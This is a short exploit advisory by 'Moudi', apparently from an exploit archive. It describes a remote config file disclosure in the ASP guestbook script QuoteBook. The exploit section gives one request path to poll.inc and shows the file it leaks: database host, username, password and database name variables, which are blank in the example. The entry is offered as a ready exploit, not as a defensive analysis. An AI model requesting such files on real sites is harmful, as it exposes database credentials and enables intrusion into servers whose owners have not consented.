id: 4621
date: 01/07/2009
title: QuoteBook (poll.inc) Remote Config File Disclosure Vulnerability
author: Moudi
cves: 

================================================================
QuoteBook (poll.inc) Remote Config File Disclosure Vulnerability
================================================================



                                                            

==============================================================================
    QuoteBook Remote Config File Disclosure Vulnerability
==============================================================================

	[»] Script:             [ QuoteBook ]
	[»] Language:           [ ASP ]
	[»] Website:            [ http://www.freedville.com/oss/download.php?package=QuoteBook ]
        [»] Thanks to:          [ MiZoZ , ZuKa , and all hackers... ]

###########################################################################

===[ Exploit ]===	
	
	[»] http://localhost/[path]/poll.inc

              $dbhost = "";
              $dbusername = "";
              $dbuserpass = "";
              $default_dbname = ";


Author: Moudi

###########################################################################



#  0day.today [2023-03-27]  #